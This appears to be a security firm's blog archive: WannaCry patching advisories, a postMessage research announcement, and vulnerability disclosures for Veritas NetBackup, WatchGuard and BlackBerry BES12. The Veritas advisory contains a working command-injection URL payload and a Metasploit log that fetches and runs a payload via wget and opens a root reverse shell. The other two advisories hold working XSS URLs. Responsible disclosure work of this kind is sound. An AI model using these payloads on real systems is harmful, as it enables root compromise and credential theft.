Malwaretech stems Wcry for now

The Internet’s Unsung Hero

Malwaretech registered the sandbox detection domain essentially shutting down any further spread overnight; but expect a new version to be released soon.

Update XP & 2003

Microsoft have issued an unusual – out of band – update for unsupported operating systems for ms17-010 for xp, 8, 2003 etc. Get patching immediately before a new version is released.

Sources

https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

https://www.forbes.com/sites/thomasbrewster/2017/05/13/wannacry-ransomware-outbreak-stopped-by-researcher/#7535e93474fc

 

 

Posted in Advisories, News, Uncategorized | Tagged , , | Comments Off on Malwaretech stems Wcry for now

Weaponised Wanna Decryptor Worm

Patch MS17-010 NOW!!!

Cryptomalware which has affected Telefonica and other organisations in Spain; and the NHS in the UK has recently been confirmed as being a fully weaponised version of the crypto malware Wanna Decryptor (aka “Wannacry” and “Wcry”).
As far as we currently understand this new strain incorporates active exploitation of the vulnerability patched in the MS17-010 update released by Microsoft in March.

This is novel behaviour for cryptomalware and we expect this to have widespread effects. We strongly advise you to ensure all internal systems (especially critical domain controllers, fileservers and exchange servers) have the MS17-010 patch applied as soon as possible.

Additionally, ensure TCP ports 3389, 445 and 139 are not exposed to the Internet.

Because of the nature of malware propagation you should ensure that any back-ups are held offline; if backups are offline they cannot be encrypted in the event of your network being hit.

Further updates will be released as we investigate the nature of this attack but do ensure you follow major news feeds on twitter, LinkedIn etc…

Sources:
https://krebsonsecurity.com/2017/05/u-k-hospitals-hit-in-widespread-ransomware-attack/
https://www.theregister.co.uk/2017/05/12/spain_ransomware_outbreak/
https://isc.sans.edu/diary/22412
https://intel.malwaretech.com/botnet/wcrypt

Posted in Advisories, News | Comments Off on Weaponised Wanna Decryptor Worm

Veritas NetBackup Appliance Unauthenticated Remote Command Execution

Sec-1 Security Advisory
Severity : High
Advisory Name : Veritas NetBackup Appliance Unauthenticated Remote Command Execution
Discovery Date : 17/05/2016
Release Date : 04/10/2016
Application : NetBackup Appliance versions 2.6.0.1 through to v2.7.3, and the v3.0 series
Platform : Linux
CVE : CVE-2016-7399
CVSSv3 Base Score : 10.0
CVSSv3 Vector : AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:F/RL:O/RC:C
Discovered by : Matthew Hall
Vendor Status : Emergency Engineering Binaries (EEBs) are available to fix this vulnerability on the following Encap releases of the NetBackup appliances: version 2.6.0.4, 2.6.1.2 and 2.7.3.
See https://www.veritas.com/support/en_US/article.000116055 for more information.
Veritas are aware that the issue is present in the current version of the product. A fix is scheduled for the NetBackup Appliances v3.0 release.
References : http://www.sec-1.com/blog
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7399
https://www.veritas.com/content/support/en_US/security/VTS16-002.html
https://www.veritas.com/support/en_US/article.000116055
https://nvd.nist.gov/vuln/detail/CVE-2016-7399

Vulnerability Summary

Unauthenticated Remote Command Execution

Description:
“Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.” (Source: OWASP).

“The software constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.” (Source: CWE-78)

Exploit

One instance was identified where an unauthenticated attacker could gain RCE on the underlying RedHat Linux operating system through the NetBackup Web Management Interface at the following URL:

    https://<appliance_ip_address>/appliancews/getLicense?hostName=<argument>

The GET parameter “hostName” is controlled by the user and is ultimately used as an argument in a system call to a perl script located at /opt/NBUAppliance/scripts/license.pl

It is possible to utilise backticks, semi-colon, ampersand, pipe characters and the bash subshell contruct “$()” to execute commands on the underlying operating system as the user which calls the license.pl script (root in this case).

As this vulnerability allows an unauthenticated attacker to gain root level privileges on the affected device, the effects could include:

  • Recovering sensitive data from system backups
  • Stealing cached credentials/password hashes from virtual machines backed up to the device
  • Enrolling the system into a botnet
  • Installation of a rootkit/backdoor for remote persistence into an internal network

Example Payload/POC

The RCE is “blind” – that is, the response from the server does not include the results of executed commands; as such, the following proof of concept can be used.

Calling the following URL will result in the server response being delayed by six seconds:

    https://<appliance_ip_address>/appliancews/getLicense?hostName=$(sleep%206)

Testing for command execution can also be performed using Out of Band techniques such as “ping” or “nslookup”, e.g:

    https://<appliance_ip_address>/appliancews/getLicense?hostName=$(ping%20<attackers_IP_address>%20-c2)

Performing a network capture from the attackers IP address should show the server sending two ICMP echo requests.

Exploit Example

A fully working exploit has been created for this issue for use within the Metasploit Framework. An example of its use is shown below.

This module available at the following URL until its incorporation into the Metasploit Framework – GitHub

msf > use exploit/linux/http/veritas_netbackup_exec
msf exploit(veritas_netbackup_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(veritas_netbackup_exec) > set RHOST 192.168.114.10
LHOST => 192.168.114.10
msf exploit(veritas_netbackup_exec) > set RPORT 443
RPORT => 443
msf exploit(veritas_netbackup_exec) > set SSL true
SSL => true
msf exploit(veritas_netbackup_exec) > info

Name: Veritas NetBackup Appliance Web Console OS Command Injection
Module: exploit/linux/http/veritas_netbackup_exec
Platform: Linux, Unix
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2016-05-17

Provided by:
Matthew Hall

Available targets:
Id Name
-- ----
0 CMD
1 Linux Payload

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DOWNFILE no Filename to download, (default: random)
DOWNHOST no An alternative host to request the payload from
HTTP_DELAY 60 yes Time that the HTTP Server will wait for the ELF payload request
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.114.10 yes The target address
RPORT 443 yes The target port
SRVHOST 192.168.114.254 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host

Payload information:

Description:
The Veritas NetBackup Appliance is vulnerable to an unauthenticated
OS Command Injection Vulnerability via arguments passed to backend
perl scripts when performing license verification. Since it is a
blind os command injection vulnerability, there is no output for the
executed command when using the cmd generic payload. This module was
tested against a Veritas NetBackup Appliance Version 2.7.2. A ping
command against a controlled system could be used for testing
purposes. The exploit uses the wget client from the device to
convert the command injection into an arbitrary payload execution.

msf exploit(veritas_netbackup_exec) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.114.254:4444
msf exploit(veritas_netbackup_exec) > [*] 192.168.114.10:443 - Starting up our web service on http://192.168.114.254:8080/lKYbcvGEQ ...
[*] Using URL: http://192.168.114.254:8080/lKYbcvGEQ
[*] 192.168.114.10:443 - Asking the Veritas device to download http://192.168.114.254:8080/lKYbcvGEQ
[*] 192.168.114.10:443 - Sending Command /usr/bin/wget%20http://192.168.114.254:8080/lKYbcvGEQ%20-O%20/tmp/hbtoqwqc
[*] 192.168.114.10:443 - Sending the payload to the server...
[*] 192.168.114.10:443 - Waiting for the victim to request the ELF payload...
[*] 192.168.114.10:443 - Asking the Veritas device to chmod lKYbcvGEQ
[*] 192.168.114.10:443 - Sending Command chmod%20777%20/tmp/hbtoqwqc
[*] 192.168.114.10:443 - Asking the Veritas device to execute lKYbcvGEQ
[*] 192.168.114.10:443 - Sending Command /tmp/hbtoqwqc
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 192.168.114.10
[*] Meterpreter session 1 opened (192.168.114.254:4444 -> 192.168.114.10:33662) at 2016-05-17 12:36:28 +0100
[+] Deleted /tmp/hbtoqwqc

msf exploit(veritas_netbackup_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
meterpreter > sysinfo
Computer : .site
OS : Linux .site 2.6.32-504.30.3.el6.x86_64 #1 SMP Thu Jul 9 15:20:47 EDT 2015 (x86_64)
Architecture : x86_64
Meterpreter : x86/linux
meterpreter >

meterpreter > ls
Listing: /opt/SYMCnbappws
=========================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40700/rwx------ 4096 dir 2016-04-27 12:57:23 +0100 Security
40775/rwxrwxr-x 4096 dir 2016-04-27 12:56:14 +0100 XSD
100664/rw-rw-r-- 7548948 fil 2016-01-20 12:48:40 +0000 appliancews.war
40775/rwxrwxr-x 4096 dir 2016-04-27 13:30:51 +0100 bin
40775/rwxrwxr-x 4096 dir 2016-04-30 15:40:17 +0100 config
40775/rwxrwxr-x 4096 dir 2016-04-27 12:56:15 +0100 docs
40775/rwxrwxr-x 4096 dir 2016-04-27 12:57:25 +0100 eat
40755/rwxr-xr-x 4096 dir 2016-04-27 12:29:49 +0100 jre
40775/rwxrwxr-x 4096 dir 2016-04-27 12:56:21 +0100 lib
40775/rwxrwxr-x 4096 dir 2016-04-27 12:56:21 +0100 resources
100755/rwxr-xr-x 12223204 fil 2016-01-20 13:06:50 +0000 server-2.7.2.war
100664/rw-rw-r-- 9722862 fil 2016-01-20 12:48:40 +0000 symhelp.war
40775/rwxrwxr-x 4096 dir 2016-04-27 12:56:22 +0100 webserver

meterpreter > pwd
/opt/SYMCnbappws

Vendor Response

As of version 2.6.0.4, 2.6.1.2 and 2.7.3 this vulnerability has been reported as being fixed. Veritas are aware that the issue is present in the current version of the product. A fix has been scheduled for the NetBackup Appliances v3.0 release.
Sec-1 would like to thank Veritas for their very professional and prompt responses in dealing with this matter.

Posted in Advisories, Tools | Comments Off on Veritas NetBackup Appliance Unauthenticated Remote Command Execution

Hunting HTML 5 postMessage Vulnerabilities

Download Paper: Hunting postMessage Vulnerabilities

Download Sample Code: sample code

Sec-1 Ltd partnered with AppCheck.com to undertake a research project investigating the security challenges posed by next generation web applications. The project included an investigation of Cross-Origin communication mechanisms provided via HTML5 including postMessage and CORS.

One of the key findings from the research shows that vulnerabilities introduced through an insecure postMessage implementation are frequently missed by security scanners and consultants performing manual review.

Summary of findings:

  • Cross-Origin communication via postMessage introduces a tainted data source that is difficult to identify using currently available tools.
  • Cross-Site Scripting and Information disclosure vulnerabilities as a result of insecure postMessage code were identified across many Fortune 500 companies and websites listed within the Alexa Top 10. Three case study reports (Adobe, Apple iCloud and YouTube) are included within this paper.
  • Discussion with members of the development and information security communities show that the vulnerabilities demonstrated within this document are poorly understood. In many cases postMessage events were not readily identified as a potential source for malicious tainted data.
  • In many cases vulnerable code is introduced via third party libraries and therefore may undermine the security of an otherwise secure application.

This paper aims to provide an overview of the most common postMessage security flaws and introduce a methodology and toolset for quickly identifying vulnerabilities during the course of a Black-box security assessment.

Proof of Concept Example: iCloud.com

The following video demonstrates a postMessage flaw identified within the Apple iCloud service. A full analysis of the flaw can be found within the Hunting postMessage Vulnerabilities whitepaper

Proof of Concept: YouTube.com

The following video demonstrates a postMessage flaw identified within YouTube.com. A full analysis of the flaw can be found within the Hunting postMessage Vulnerabilities whitepaper

Posted in News, Tools, White Papers | Comments Off on Hunting HTML 5 postMessage Vulnerabilities

Sec-1 Advisory: Reflected Cross-Site Scripting and Open Redirect in WatchGuard Fireware v11.11

Sec-1 Security Advisory
Severity : Medium
Advisory Name : Reflected Cross-Site Scripting and Open Redirect in WatchGuard Fireware v11.11
Discovery Date : 27/04/2016
Release Date : 11/07/2016
Application : WatchGuard Fireware version 11.11 and earlier
Platform : Windows
CVE : CVE-2016-6154
Discovered by : Ryan Ward
Vendor Status : Resolved in v11.11.1 Fireware Update available from: https://www.watchguard.com/support/release-notes/fireware/11/en-US/EN_ReleaseNotes_Fireware_11_11_1/index.html#Fireware/en-US/EN_Release_Notes_Fireware.html
Website : http://www.sec-1.com/blog
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6154
http://www.watchguard.com/support/release-notes/fireware/11/en-US/EN_ReleaseNotes_Fireware_11_11_1/Fireware_Release-Notes_v11_11_1.pdf

Vulnerability Summary

Reflected Cross-Site-Scripting (Reflected XSS) and Open Redirection

Cross-Site-Scripting (XSS) is a vulnerability that occurs when user entered data is accepted by the server and returned in a response to the user without proper sanitisation, which allows an attacker to embed malicious scripts within a request which is later served to another user. Reflected XSS occurs when the malicious data is immediately returned in a response to a malicious request, whereas Stored XSS occurs when the malicious data is held by the application for some time before being embedded in a response (such as being stored in a database and then retrieved at a later date).

Open redirection vulnerabilities occur when an application incorporates user controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users.

Exploit

A single parameter on the SSL-VPN authentication applet of WatchGuard firewalls running Fireware < v11.11.1 were found to be vulnerable to both Reflected Cross-Site Scripting (XSS) and Open Redirection. This would allow an attacker to launch XSS attacks against targeted users by sending them crafted links (for example, by sending a malicious link in a targeted email). The effects could, for example, include:

  • Stealing access credentials from a targeted user as that user logs in
  • Stealing an access token from a targeted user as that user logs in
  • Displaying a malicious or political message to the user (virtual defacement)

Example Payload/POC
The vulnerability can be reproduced by browsing to “success.html?redirect=javascript:alert(document.domain)” on the SSL-VPN port (4100 by default) on any affected WatchGuard.

https://Firewall_IP:4100/success.html?redirect=javascript:alert(“Sec-1”)

watchg

The same parameter was also found to be vulnerable to an open redirect. https://Firewall_IP:4100/success.html?redirect=http://www.sec-1.com would redirect the users browser to the Sec-1 homepage.

Vendor Response


As of Fireware 11.11.1 this vulnerability has been reported as being fixed by WatchGuard. Sec-1 would like to thank WatchGuard for their prompt and professional response.

Posted in Advisories | Comments Off on Sec-1 Advisory: Reflected Cross-Site Scripting and Open Redirect in WatchGuard Fireware v11.11

Sec-1 Advisory: Reflected Cross-Site-Scripting in Blackberry BES12 version 12.4

Sec-1 Security Advisory
Severity : Medium
Advisory Name : Reflected Cross-Site-Scripting in Blackberry BES12 version 12.4
Discovery Date : 23/02/2016
Release Date : 12/04/2016
Application : BES12 version 12.4 and earlier
Platform : Windows
CVE : CVE-2016-1917
CVE-2016-1918
Discovered by : Nicodemo Gawronski
Vendor Status : Resolved in April 2016 Blackberry Update available from http://web.blackberry.com/support/business/bes-support/bes-support-downloads.html
Website : http://www.sec-1.com/blog
http://support.blackberry.com/kb/articleDetail?articleNumber=000038118
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1917
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1918

Vulnerability Summary

Reflected Cross-Site-Scripting (Reflected XSS)

Two instances of Reflected Cross-Site-Scripting were discovered on the affected software.
Cross-Site-Scripting (XSS) is a vulnerability that occurs when user entered data is accepted by the server and returned in a response to the user without proper sanitisation, which allows an attacker to embed malicious scripts within a request which is later served to another user. Reflected XSS occurs when the malicious data is immediately returned in a response to a malicious request, whereas Stored XSS occurs when the malicious data is held by the application for some time before being embedded in a response (such as being stored in a database and then retrieved at a later date).

Exploit

Two parameters on the “admin/settings/redirect.do” and “admin/user/userDetails.do” of the BES12 web server were found to be vulnerable to Reflected Cross-Site Scripting (XSS).
This would allow an attacker to launch XSS attacks against targeted users by sending them crafted links (for example, by sending a malicious link in a targeted email). The effects could, for example, include:

  • Stealing access credentials from a targeted user as that user logs in
  • Stealing an access token from a targeted user as that user logs in
  • Displaying a malicious or political message to the user

Example Payload/POC

Steps to reproduce the vulnerability:

  1. Log in to the BES12 Server.
  2. Access the following URLs:
https://BES12_Server_IP/admin/settings/redirect.do?settingUrl=%22-alert%28document.domain%29-%22
Reflected XSS in "/admin/settings/Redirect.do"

Reflected XSS in “/admin/settings/Redirect.do”

https://BES12_Server_IP/admin/user/userDetails.do?userId=3&backLocation=usergrid”);alert(1);//&suppressLoginWizard=true&gridHandleId=50896ee8-f282-4713-b54d-33f7725099fb
Reflected XSS BES12 "/admin/user/Userdetails.do"

Reflected XSS in “/admin/user/Userdetails.do”

This is a simplistic payload which will simply display a pop up message warning the users that the page is vulnerable; however a more advanced payload could easily be generated to perform actions as discussed above.

Vendor Response

The vendor has patched the XSS issues in the April 2016 Software Update. Sec-1 would like to thank Blackberry for their prompt and professional response.

Posted in Advisories | Comments Off on Sec-1 Advisory: Reflected Cross-Site-Scripting in Blackberry BES12 version 12.4